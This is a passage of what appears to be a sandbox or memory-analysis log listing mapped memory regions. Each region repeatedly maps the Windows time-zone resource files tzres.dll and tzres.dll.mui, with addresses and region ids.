filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3451
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3452
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3453
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3454
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3455
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3456
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3457
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3458
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3459
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3460
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3461
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3462
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3463
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3464
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3465
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3466
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3467
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3468
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3469
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3470
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3471
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3472
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3473
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3474
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3475
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3476
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3477
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3478
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3479
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3480
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3481
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3482
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3483
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3484
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3485
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3486
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3487
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3488
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3489
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3490
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3491
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3492
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3493
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3494
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3495
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3496
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3497
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3498
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3499
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3500
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3501
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3502
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3503
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3504
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3505
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3506
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3507
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3508
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3509
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3510
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3511
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3513
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3514
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3515
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3516
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3517
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3518
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3519
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3520
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3521
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3522
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3523
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3524
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3525
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3526
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3527
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3528
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3529
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3530
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3531
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3532
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3533
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3534
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3535
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3536
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3537
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3538
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3539
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3540
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3541
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3542
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3543
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3544
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3545
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3546
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3547
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3548
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3549
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3550
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3551
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3552
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3553
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3554
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3555
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3556
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3557
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3558
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3559
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3560
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3561
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3562
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3563
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3564
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3565
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 3566
start_va = 0xab0000
end_va = 0xab6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 3567
start_va = 0xaa0000
end_va = 0xaa0fff
monitored = 0
